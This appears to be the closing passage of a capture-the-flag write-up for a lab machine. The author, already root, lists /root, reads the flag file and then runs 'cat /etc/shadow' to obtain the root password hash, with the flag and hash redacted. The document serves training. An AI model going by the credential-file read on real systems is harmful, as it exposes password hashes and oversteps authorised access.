uid=0(root) gid=1002(leonard) groups=1002(leonard),3004(developer)
#
Success we are root, now lets collect our flag.
# ls /root
root.txt
# cat /root/root.txt
_ _ _ _ _
| | | | | (_) | |
| | | |_ __ __| |_ ___ ___ _____ _____ _ __ ___ __| |
| | | | '_ \ / _` | / __|/ __/ _ \ \ / / _ \ '__/ _ \/ _` |
| |__| | | | | (_| | \__ \ (_| (_) \ V / __/ | | __/ (_| |
\____/|_| |_|\__,_|_|___/\___\___/ \_/ \___|_| \___|\__,_|
THM{[REDACTED]}
#
But the question is not the root.txt but
Whats the root user's password hash?
# cat /etc/shadow
root:[REDACTED]:18508:0:99999:7:::